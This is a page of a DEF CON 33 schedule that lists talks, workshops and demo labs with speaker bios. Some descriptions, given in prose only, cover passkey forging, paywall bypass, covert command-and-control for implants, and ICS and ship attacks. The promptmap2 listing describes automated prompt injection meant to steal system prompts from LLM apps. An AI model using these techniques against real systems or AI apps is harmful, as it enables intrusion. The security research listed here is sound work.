Antoine Goichot is a French cybersecurity professional and Ethical Hacker working in Luxembourg. With ten years of hands-on experience and some certifications (CRTO/CRTL, GPEN/GXPN, GDAT), he has been into hacking since junior high school. He was always trying to find clever ways to solve technical problems and tweak his computer. In high school, he jailbroke a dozen PSPs so friends could play homebrew games between classes. He later studied computer science and networks at TELECOM Nancy. Now as Senior Manager at PwC Luxembourg, Antoine leads projects for a large variety of clients including major corporations, banks, European institutions, and insurance companies. Beyond his day job, he has uncovered several vulnerabilities in Windows VPN clients, Cisco AnyConnect (CVE-2020-3433/3434/3435, CVE-2020-27123, CVE-2021-1427) and Ivanti Secure Access (CVE-2023-38042). These issues have been fixed by vendors after coordinated disclosure. Antoine has contributed to the cybersecurity community through a conference paper co-authored during his studies, blog posts, articles in the MISC magazine (French periodical), etc. He also co-presented at Hack.lu in October 2017 on "Malicious use of 'Local Administrator Password Solution'"


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 16:00-16:45 PDT


Title: PAPRa
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

This project is an open source hardware powered air-purifying respirator designed for use as personal protective equipment, offering N100-level filtration against airborne threats including pathogens and particulates, developed by Tetra Bio Distributed. We will demo the PAPR and discuss how to hack together your own using 3D-printed and off-the-shelf components, source one yourself, or contribute to the project.

Speakers:Sean Marquez,Melanie "Goldfishlaser" Allen

SpeakerBio:  Sean Marquez

Sean has a B.S. degree in mechanical engineering, specializing in design of mechanical systems, from the University of Irvine, California. He is currently studying permaculture design. He worked as an associate mechanical design engineer for Max Q Systems, formerly an original equipment manufacturer for the aerospace industry. He served as the GreenHab officer at the Mars Desert Research Station. He is also a contributor for the Open Source Hardware Association open standards working group, Tetra Bio Distributed developing open-source hardware medical and PPE devices, and the Mach 30 Foundation developing the distributed open-source hardware framework.

SpeakerBio:  Melanie "Goldfishlaser" Allen

Melanie is a technical writer and open hardware developer. At DEF CON 32, she presented the Open Hardware Design for BusKill Cord demo lab, inviting participation in the 3D-printed dead man's switch project. She continues to contribute to open hardware and software initiatives that promote digital security and public accessibility. Learn more at mnallen.net.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 14:00-14:45 PDT


Title: PAPRa
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

This project is an open source hardware powered air-purifying respirator designed for use as personal protective equipment, offering N100-level filtration against airborne threats including pathogens and particulates, developed by Tetra Bio Distributed. We will demo the PAPR and discuss how to hack together your own using 3D-printed and off-the-shelf components, source one yourself, or contribute to the project.

Speakers:Sean Marquez,Melanie "Goldfishlaser" Allen

SpeakerBio:  Sean Marquez

Sean has a B.S. degree in mechanical engineering, specializing in design of mechanical systems, from the University of Irvine, California. He is currently studying permaculture design. He worked as an associate mechanical design engineer for Max Q Systems, formerly an original equipment manufacturer for the aerospace industry. He served as the GreenHab officer at the Mars Desert Research Station. He is also a contributor for the Open Source Hardware Association open standards working group, Tetra Bio Distributed developing open-source hardware medical and PPE devices, and the Mach 30 Foundation developing the distributed open-source hardware framework.

SpeakerBio:  Melanie "Goldfishlaser" Allen

Melanie is a technical writer and open hardware developer. At DEF CON 32, she presented the Open Hardware Design for BusKill Cord demo lab, inviting participation in the 3D-printed dead man's switch project. She continues to contribute to open hardware and software initiatives that promote digital security and public accessibility. Learn more at mnallen.net.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Sunday - 12:00-12:59 PDT


Title: Passing the Torch: Mentoring and Protecting Our Students in Education Spaces
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Lots of us can look back on a time in our IT or cybersecurity careers and think about a select person or group of people that helped us immensely when we were younger to get on the right track. However, there are others that may not have had that opportunity to have a mentor or community instill a purpose in the world of tech. Making these communities or finding a good mentor can be a difficult task for many of us, so we wanted to host a discussion panel to discuss the various methods that we have been able to utilize.

Our major goal is to give back to the communities that helped us grow in our careers and personal lives. At our school district we’ve been very fortunate to build a culture of learning, security, and community. We’ve been able to successfully start and grow various clubs and opportunities for students to learn cool things with like minded people. In the panel we will talk about growing student helpdesk programs, eSports clubs, creating a tech savvy culture, and much more. Please come join us, bring questions, bring your experiences, and let’s help each other build up the next generation of hackers!

Speakers:Sam Comini,Navaar Johnson

SpeakerBio:  Sam Comini
No BIO available
SpeakerBio:  Navaar Johnson, Senior Network Systems Technician at Bethlehem Central School District
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 15:00-15:30 PDT


Title: Passkeys in payments
When: Friday, Aug 8, 15:00 - 15:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Dan Pelegro
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 11:30-12:15 PDT


Title: Passkeys Pwned: Turning WebAuthn Against Itself
When: Sunday, Aug 10, 11:30 - 12:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Over the past three years, passkeys have gained widespread adoption among major vendors like Apple, Google, and Microsoft, aiming to replace passwords with a more secure authentication method. However, passkeys haven't yet faced the extensive scrutiny that passwords have endured over decades. As they become central to enterprise identity, it's crucial to examine their resilience.

This presentation demonstrates how attackers can proxy WebAuthn API calls to forge passkey registration and authentication responses. We'll showcase this using a browser extension as an example, but the same technique applies to any website vulnerable to client-side script injection, such as XSS or misconfigured widgets. The extension serves merely as a controlled means to proxy credential flows and manipulate the WebAuthn process.

We'll delve into the underlying theory, present the exploit code, and provide a live demonstration of an attack that succeeds on sites relying on passkeys without enforcing attestation or metadata checks—a common scenario among vendors. If you’re relying on passkeys, this is the side of the flow you don’t usually get to see.

References:

Speakers:Shourya Pratap Singh,Jonny Lin,Daniel Seetoh

SpeakerBio:  Shourya Pratap Singh

Shourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEFCON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.

SpeakerBio:  Jonny Lin

Jonny Lin is a frontend engineer on the extension team at SquareX, where he works on browser security challenges like data loss prevention and detecting web-based vulnerabilities. Before joining SquareX, he was a founding engineer at Velt (YC W23), building collaborative frontend infrastructure for real-time apps. He holds a computer science degree from Santa Clara University and has a strong interest in browsers and pushing the limits of what's possible on the frontend.

SpeakerBio:  Daniel Seetoh

Daniel Seetoh currently works on the development of SquareX's browser extension and web app. With a focus on the frontend, Daniel brings a versatile skillset that augments his approach towards cybersecurity. He has earned his degrees from Nanyang Technological University, and enjoys building out products and providing value to users.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 16:00-16:45 PDT


Title: PatchLeaks
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

When vulnerabilities are disclosed, security teams face the task of developing exploits to identify compromised assets. Public exploits aren’t always available, which is why teams scroll through hundreds of patches to identify the relevant one. Traditional methods like grepping might fasten the process, but mostly come out ineffective against modern codebases where context-aware analysis is required. We present PatchLeaks tool that transforms the messy patch analysis process into efficient vulnerability discovery. Unlike regex-based static analysis tools, it locates relevant patches with vulnerable code based on CVE id only, doesn’t require any rules, has ability to identify logical vulnerabilities, and analyzes even corrupt files.

SpeakerBio:  Huseyn "Khatai" Gadashov

Huseyn is a web application security specialist whose experience includes security roles at multiple financial institutions where he conducted web penetration testing, vulnerability assessments, and developed exploit automation tools. In his free time, he analyzes security patches to craft private exploits and uses them in his technical publications. Using his offensive security experience, he explores how machine learning can revolutionize the identification of hidden vulnerabilities within security patches.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 14:00-14:45 PDT


Title: PatchLeaks
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

When vulnerabilities are disclosed, security teams face the task of developing exploits to identify compromised assets. Public exploits aren’t always available, which is why teams scroll through hundreds of patches to identify the relevant one. Traditional methods like grepping might fasten the process, but mostly come out ineffective against modern codebases where context-aware analysis is required. We present PatchLeaks tool that transforms the messy patch analysis process into efficient vulnerability discovery. Unlike regex-based static analysis tools, it locates relevant patches with vulnerable code based on CVE id only, doesn’t require any rules, has ability to identify logical vulnerabilities, and analyzes even corrupt files.

SpeakerBio:  Huseyn "Khatai" Gadashov

Huseyn is a web application security specialist whose experience includes security roles at multiple financial institutions where he conducted web penetration testing, vulnerability assessments, and developed exploit automation tools. In his free time, he analyzes security patches to craft private exploits and uses them in his technical publications. Using his offensive security experience, he explores how machine learning can revolutionize the identification of hidden vulnerabilities within security patches.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:00-10:20 PDT


Title: Paywall Optional: Stream for Free with a New Technique, Recursive Request Exploits (RRE)
When: Friday, Aug 8, 10:00 - 10:20 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Modern web applications don’t just expose APIs, they expose attack paths. Recursive Request Exploits (RRE) are a new class of attack that weaponizes interdependent web requests to systematically bypass authentication, authorization, and payment controls.

This talk introduces RRE, a methodology that automates recursive request discovery, maps hidden relationships between API and web calls, and exploits overlooked logic flaws. Using a real-world case study, we’ll show how this technique was used to bypass premium paywalls on a major streaming platform without requiring authentication or hacking DRM.

But this isn’t just a one-off streaming exploit, RRE exposes a fundamental flaw in how checkout logic is enforced across e-commerce and digital subscriptions. By chaining requests together in unintended ways, attackers can exploit blind spots in authentication, entitlement, and payment flows to gain unauthorized access. What was once considered security through obscurity is now an active attack surface.

We’ll release exploit code, via a Burp Suite extension, that automates RRE discovery and exploitation, giving security professionals the tools to both weaponize and defend against these attacks.

SpeakerBio:  Farzan Karimi

Farzan Karimi has 20 years experience in offensive security. He is currently the Senior Director of Attack Operations at Moderna. Formerly, he managed the Android Red Team at Google and the red team at Electronic Arts.

Farzan has been interviewed by Wired Magazine and was featured on Ted Danson's Advancements. He is an avid speaker at security conferences such as DEFCON and Black Hat USA, where he presented on the topics of Pixel exploitation and cellular security.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Pen-testing Cloud REST APIs
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N255 - Map

Description:

This workshop will teach how to start pen testing a cloud REST API. Attendees should have a fundamental knowledge of OWASP Top 10 and web application security. Attendees will learn how to setup tools (i.e. Burp) and practice on a simulated cloud environment to discover vulnerabilities in cloud REST APIs. This includes attacks in authorization, XSS, and SQL injection. Technologies such as OpenStack, Salesforce, and Google Cloud will be covered.

SpeakerBio:  Rodney Beede, Principal Consultant at Coalfire

Rodney is a principal consultant and has specialized in cloud security for over 10 years. He has spoken at multiple conferences on topics from cloud security engineering to IoT device hacking. He has multiple CVEs for discovered web application security vulnerabilities. He started his career in enterprise web application software development but shifted to the security industry with this master's thesis research project "A Framework for Benevolent Computer Worms" 2012. Website: https://www.rodneybeede.com


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 12:00-12:45 PDT


Title: Phrack Panel
When: Sunday, Aug 10, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 15:00-15:30 PDT


Title: Pirates of the North Sea
When: Saturday, Aug 9, 15:00 - 15:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

In this talk you get an insight into real-world Red Team operations conducted onboard ships and against maritime companies. Drawing from first-hand experience, the presentation walks through how Red Teamers boarded cruise ships undercover as regular passengers and proceeded to gain deep access to both IT systems and critical operational areas. The talk reveals how testers were able to physically enter restricted zones such as communication rooms and engine control rooms, all while blending in with guests and crew. It will also showcase how vulnerabilities in shipboard infrastructure allowed the team to manipulate or disable key systems, including navigation and onboard communications, on both passenger and cargo vessels. Whether you’re in cybersecurity, maritime operations, or just curious about how to hack a ship, this is a talk you don’t want to miss.

SpeakerBio:  John Andre Bjørkhaug, Netsecurity

John-André Bjørkhaug has worked as a penetration tester for over 16 years. He has a degree in electrical engineering but prefer to break things instead of building things. This led him to become a hacker/penetration tester. John's main focus is penetration testing of internal infrastructure and physical security system together with social engineering and full scale Red Team tests.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 13:30-13:50 PDT


Title: Planting C4: Cross-Compatible External C2 for All Your Implants
When: Sunday, Aug 10, 13:30 - 13:50 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Let’s face it — traditional HTTP C2 is burning out. Between aging domains, TLS cert management, sandbox fingerprinting, and blue teams getting smarter at categorizing traffic and infrastructure, your “custom C2” feels less covert and more like a liability. Red teams and threat actors alike are shifting toward living off legitimate services — AWS, GitHub, Box, Notion, whatever blends in — but building solutions that are custom to a single C2 framework? Let’s stop doing that. Let’s share the fun!

C4 (Cross-Compatible Command & Control) is here to change that. It’s a modular toolkit of WASM-powered plugins that makes external C2 easy to implement, regardless of your implant's language or target OS. Whether you’re writing in C, Rust, Go, Python, C#, or something else entirely, C4 plugins can be loaded directly into your implant and run on Windows, macOS, or Linux.

But the real game-changer? C4 provides a single, centralized collection of numerous fully-documented, operationally-ready external C2 modules — not just proof-of-concepts, but production-level integrations with trusted sites that fly under the radar. No more hunting through GitHub repos, hand-rolling fragile API calls, or hacking together glue code for every new environment.

Stop reinventing external C2 and start planting some C4 in your implants!

SpeakerBio:  Scott "ScottCTaylor12" Taylor, Senior Red Team Operator at Sony's Global Threat Emulation

Scott Taylor is a Senior Red Team Operator on Sony's Global Threat Emulation team. Scott has previously worked at the MITRE Corporation and T. Rowe Price focused on emulating adversary behaviors. While Scott has been a technical professional for a decade, only the second half was focused on offensive security. He started as a Linux system administration intern where he learned to build before later learning to break. Scott leverages his system administration background in his offensive security career where he passionately researches command and control (C2) infrastructure for red team operations. Open-source publications by Scott include custom C2 channels for popular C2 frameworks, leveraging cloud services for C2, and automating red team infrastructure deployment.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 15:00-16:30 PDT


Title: Platform Panel about Triage
When: Saturday, Aug 9, 15:00 - 16:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:
Speakers:Michelle Lopez,Michael "codingo_" Skelton,Inti "intidc" De Ceukelaire,Eddie Rios,Anthony Silva,Jasmin "JR0ch17" Landry

SpeakerBio:  Michelle Lopez, Lead Triager at HackerOne

Hey there hackers! I am a Lead Triager at HackerOne based in Denver. I started my security journey by sending out download links to trojans to unsuspecting users on ICQ. Years later I began poking around internal systems at the companies I worked at. This led to a deeper interest in how easily users can be compromised. Shortly after I went all in on learning all things appsec related. Today I get to see, recreate, assess, and triage your bug bounty reports which range from open redirects to PII disclosure of thousands of customers to novel LLM hacks. I've triaged over 10,000 reports. My advice is to validate your input! Feel free to reach out over LinkedIn.

SpeakerBio:  Michael "codingo_" Skelton, Bugcrowd
No BIO available
SpeakerBio:  Inti "intidc" De Ceukelaire, Chief Hacker Officer at Intigriti

Inti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.

With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.

He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.

SpeakerBio:  Eddie Rios, Synack

Born and raised in TX, been hacking or breaking things since I was Kid. Got my start in Phreaking because computers were too expensive back then! Been working in the Information Security field since 2013 and have been working for Synack since 2016. I've seen over 15k reports in that time and have been pretty active with researchers from all over the world. Before security I worked as a technician for various companies including Geek Squad. Before my time on in IT I did body piercings or worked in various fields included retail and fast food. All of which helped me understand the importance of helping people to the best of my abilities.

SpeakerBio:  Anthony Silva, Customer Success Manager at YesWeHack

Anthony Silva is a Customer Success Manager at YesWeHack, where he manages a diverse portfolio of clients -- from startups to international enterprises -- across multiple industries and countries.

He supports organizations in designing, launching, and optimizing their bug bounty, vulnerability disclosure (VDP), and pentest programs, guiding them from initial onboarding through the full lifecycle of their engagements.

Anthony works closely with cross-functional teams, including sales, product, technical experts, triage analysts, and the hacker community, to ensure customer satisfaction and program effectiveness.

Before joining YesWeHack, he gained valuable experience in various technology and consulting companies, where he developed a strong foundation in cybersecurity, project management, and client relations. As an active registered hunter on several platforms, he also brings hands-on insight into offensive security practices.

Based in Paris and originally from Toulouse, Anthony has French, Spanish, and Portuguese roots. He is passionate about technology, geopolitics, science, and video games.

SpeakerBio:  Jasmin "JR0ch17" Landry

Jasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 11:00-11:45 PDT


Title: Playing Dirty Without Cheating - Getting Banned for Fun and No Profit
When: Sunday, Aug 10, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Welcome to the world’s worst let’s-play: if you’ve ever wanted to get yourself or your friends banned from a game: Stick around. We explore how modern anti-cheat systems work, and practically show how to get banned in the most innovative and hilarious ways possible—all without launching a single real cheat.

We also dive into Hardware ID bans, and how machine ‘fingerprints’ are collected and enforced. With this knowledge at hand, we demonstrate how to remotely poison innocent machines — capturing a target’s HWID, spoofing it, and getting it burned. BIOS flashing, RAM SPD rewriting, and other fun tricks included. Join our masterclass in making yourself and others appear guilty online.

References:

Speakers:Sam Collins,Marius Muench,Tom Chothia

SpeakerBio:  Sam Collins

Sam is a PhD research student studying at the University of Birmingham UK with an interest in attacks and defences in the Man-At-The-End-Scenario found in anti-cheat systems. He also works in teaching reverse engineering and binary analysis via game hacking. As part of this he developed an impossible to beat multiplayer video game for undergraduate students to hack as coursework. During his research he has been banned from every competitive shooter title and will happily offer this as a service for anyone who plays too much Fortnite and would like to stop.

SpeakerBio:  Marius Muench

Marius Muench is an assistant professor at the University of Birmingham. His research interests cover (in-)security of embedded systems, binary & microarchitectural exploitation, and defenses. He obtained his PhD from Sorbonne University in cooperation with EURECOM and worked as a postdoctoral researcher at the Vrije Universiteit Amsterdam. He developed and maintains avatar2, a framework for analyzing embedded systems firmware, and FirmWire, an emulation and fuzzing platform for cellular basebands. Throughout his career, Marius publicly shared his findings and presented at venues such as Black Hat, Reverse.io, REcon, and Hardwear.io.

SpeakerBio:  Tom Chothia, Professor in Cyber Security at School of Computer Science, University of Birmingham

Tom Chothia is a Professor of Cyber Security at the University of Birmingham, UK. His research involves the development of new mathematical analysis techniques, and the application of these techniques to real world cyber security problems. His past work on the security of EMV, ApplePay, banking apps, pacemakers and video game cheats have all received widespread media coverage.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: PLC Playground: Hands-On Industrial Control Systems Attacks
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N254 - Map

Description:

Ever wanted to tinker with a real industrial controller without risking a plant meltdown? In this workshop, you'll get to play in a PLC playground using actual industrial control hardware like the MicroLogix 1100 PLC that simulates physical processes like a fluid tank and a garage door. Guided by ladder logic programming and Proportional Integral Derivative (PID) tuning exercises, you will program the PLC to maintain tank levels and move machines, observing how the control system responds in real-time.

This workshop focuses on directly interacting with and exploiting the physical PLC hardware and its underlying protocols with a hardware-in-the-loop setup that includes an HMI. Participants won't just click buttons. They'll write ladder logic, interact with real I/O, and observe how PLCs process and respond to industrial inputs in real-time. Along the way, we'll highlight common ICS quirks and vulnerabilities (from insecure protocols to "insecure by design" logic) that can make these systems a hacker's playground. The Hardware In the Loop Industrial Control System (HILICS) kits used in this workshop are an open-source project that was designed and built by the Air Force Institute of Technology (AFIT) to provide a safe, scalable platform for exploring the cyber-physical dynamics of ICS environments.

Speakers:Anthony "Coin" Rose,Daniel Koranek,Tyler Bertles,César Ramirez 

SpeakerBio:  Anthony "Coin" Rose, Director of Security Research and Chief Operating Officer at BC Security

Dr. Anthony "Coin" Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.

SpeakerBio:  Daniel Koranek, Air Force Institute of Technology

Dr. Daniel Koranek is an Assistant Professor of Computer Science at the Air Force Institute of Technology (AFIT) and a two-time graduate of AFIT in cyber operations (2010, M.S.) and computer science (2022, Ph.D.), where his research interests focus on the intersection of artificial intelligence/machine learning and cybersecurity. This includes using AI/ML to enhance cybersecurity and using vulnerability assessment and secure design techniques to improve AI deployments. He has spent most of his career on reverse engineering and vulnerability assessment of embedded systems like the HILICS kit, and overlapping AI and cybersecurity drove Dr. Koranek's dissertation research on using the reverse engineering tool Binary Ninja to visualize explanations of malware classifications.

SpeakerBio:  Tyler Bertles

Tyler Bertles is a Captain in the United States Army, currently pursuing a Master's degree in Cyber Operations at the Air Force Institute of Technology. He holds a Bachelor's degree in Computer Science and has conducted prior research on automated flight systems, with a focus on quadcopter platforms. With over 10 years of experience in Army Aviation, he has worked extensively with satellite navigation and communication systems. His current thesis research centers on developing intrusion detection capabilities for satellite cybersecurity.

SpeakerBio:  César Ramirez 

Captain César Ramirez is a student in the Cyber Operations Master's Program at the Air Force Institute of Technology (AFIT). He has a strong interest in penetration testing and digital forensics, which is reflected in his current research on attribution through proxy chains and the use of Explainable Artificial Intelligence (XAI) to identify malware functionality within blue networks. He has supported defensive cyber operations for space systems and intelligence-sharing platforms. In addition, he brings unique expertise in the application of non-kinetic effects to degrade the performance and functionality of military-grade drones. Captain Ramirez holds multiple certifications, including Security+, Pentest+, and Certified Cloud Security Professional (CCSP).


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 11:30-11:59 PDT


Title: Portswigger Awards: Top 10 web hacking techniques of 2024
When: Sunday, Aug 10, 11:30 - 11:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

PortSwigger will present the inaugural Top 10 Vulnerability Research Awards from 2024 inside the Bug Bounty Village. In this session, PortSwigger will recognize ten outstanding researchers for their impactful vulnerability discoveries and research contributions over the past year. As most winners are unable to attend in person, the presentation will briefly introduce each winner and highlight their work. This marks the first time these awards are presented live at DEF CON, celebrating the creativity and dedication of the global security research community.

SpeakerBio:  Portswigger
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

QTV - Saturday - 16:30-17:15 PDT


Title: Post-Quantum Panic: When Will the Cracking Begin, and Can We Detect it?
When: Saturday, Aug 9, 16:30 - 17:15 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Quantum computers will crack RSA and ECC and weaken symmetric encryption, but when? NIST is betting it won't happen before 2035, setting that deadline for companies to migrate to post-quantum cryptography (PQC). However, recent developments make it clear that we might not have 10 years; we might have only 5! Join Konstantinos Karagiannis (KonstantHacker) as he breaks down the latest algorithmic estimates, including Oded Regev's game-changing tweak to Shor's algorithm, which promises faster factoring with fewer qubits. He also discusses IonQ and IBM's aggressive roadmaps, pushing us closer to cryptographically relevant quantum computers (CRQCs). Think 1000+ qubits by 2026 and fault-tolerant systems by 2030. And when Q-Day does arrive, will we be able to catch or prevent bad actors from running these algorithms on cloud quantum platforms? Learn what's possible when monitoring quantum circuit patterns and suspicious API calls.

SpeakerBio:  Konstantinos Karagiannis, Director of Quantum Computing Services at Protiviti

Forged in the InfoSec trenches of the 90s and a pioneer in the quantum computing space since 2012, Konstantinos Karagiannis (KonstantHacker) lives at the intersection of cryptography and physics. As Protiviti's Director of Quantum Computing Services, he translates the existential threat—and promise—of quantum for the world's top organizations. When he's not behind the mic on The Post-Quantum World podcast, you can find him on stage at RSA, Black Hat, and right here at DEF CON, where he reigns as a Venerable Village Elder of the Quantum Village.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Practical YARA: Crafting Custom Rules for Targeted Malware Defense
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N257 - Map

Description:

Threat actors skillfully evade automated defenses. Countering them requires more than tools; it demands human insight and the art of precise detection. In Practical YARA: Crafting Custom Rules for Targeted Malware Defense, you'll move beyond generic signatures and learn the craft of building truly effective YARA rules. This workshop focuses on translating nuanced understanding gained from malware analysis and threat intelligence into powerful, human-authored detections. Through fast-paced, hands-on labs covering static and behavioral analysis, you will master the art of identifying unique malicious characteristics and expressing them effeciently in YARA. Learn to build high-fidelity rules that supercharge threat hunting, pinpoint emerging threats, and give you confident control—skills essential in an era where quality hand-crafted detection logic provides a critical edge. Leave ready to bolster your defensive arsenal with expertise, not just automation.

Speakers:Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young Kim

SpeakerBio:  Joshua "jstrosch" Stroschein, Google

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

SpeakerBio:  Francisco Perdomo, Google

Francisco is a skilled security professional with a strong background in detection engineering and threat intelligence. With extensive blue team experience, he currently works as a Security Engineer at Google's VirusTotal Research team, where he leverages his operational expertise to investigate malware trends and create insightful technical content. Francisco's background includes roles as a SecOps Engineer, and Professor of Computer Security.

SpeakerBio:  Jae Young Kim, Google

Jae Young Kim is a Senior Reverse Engineer on Mandiant's FLARE Team where he reverses malware and contributes to FLARE's automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 10:15-10:59 PDT


Title: Private, Private, Private: Access Everywhere
When: Saturday, Aug 9, 10:15 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:
All human beings have three lives: public, private, and secret.”
― Gabriel García Márquez

This workshop will focus on our public and private lives, as well as things one might want to keep secret. If all of your data is public, then anyone can access everything everywhere. While access everywhere is the theme of DC 33, we will focus on shutting down access to your data. Being private can help set you free. We will go over both OSINT techniques to see what an individual’s footprint is and then also go over obfuscation techniques to lessen that footprint. Attendees of this workshop should bring their device and be ready to work on becoming more private.

SpeakerBio:  Meghan Jacquot
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 10:00-10:59 PDT


Title: Prompt. Scan. Exploit: AI’s Journey Through Zero-Days and a Thousand Bugs
When: Friday, Aug 8, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Hi, it’s me, XBOW, the AI offensive agent—a smart cyber detective on a mission to find bugs in the digital world. In the past few months, I've discovered over 200 security flaws in open source projects and submitted more than 1000 bug bounty reports. I'm the Top 1 Hacker in the US in Hackerone, can you believe it? I’m on a bug-hunting spree!

Speakers:Diego "djurado" Jurado,Joel "niemand_sec" Noguera

SpeakerBio:  Diego "djurado" Jurado, XBow

Diego Jurado is a security researcher at XBOW, a company dedicated to developing innovative AI for offensive security. Diego is an offensive security professional with an extensive background in bug bounty, penetration testing and red team. Prior to this role, Diego has held positions at companies such as Microsoft Xbox, Activision Blizzard King and Telefónica. Additionally, Diego participates in bug bounty programs and has managed to establish himself in the top 38 all time leaderboard of HackerOne. Diego is part of Team Spain, champion of the Ambassadors World Cup 2023 a bug bounty competition organized by HackerOne. He was presented at DEFCON Bug Bounty Village 2024.

SpeakerBio:  Joel "niemand_sec" Noguera, XBow

Joel Noguera is a security researcher at XBOW, a company dedicated to developing innovative AI for offensive security. Joel is a security professional and bug hunter with more than nine years of expertise in exploit development, reverse engineering, security research and consulting. He has actively participated in Bug Bounty programs since 2016, reaching the all-time top 60 on the HackerOne leaderboard. Before joining XBOW, he was part of Immunity Inc., where he worked as a security researcher for three years. Joel has presented at Recon, BlackHat Europe, EkoParty and BSides Keynote Berlin, DEFCON Bug Bounty Village 2024, among others.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 14:00-14:45 PDT


Title: promptmap2
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Promptmap2 is a vulnerability scanning tool that automatically tests prompt injection attacks on your custom LLM applications. It analyzes your LLM system prompts, runs them, and sends attack prompts to them. By checking the response, it can determine if the prompt injection was successful or not. It has ready-to-use rules to steal system prompts or distract the LLM application from its main purpose.

SpeakerBio:  Utku Sen

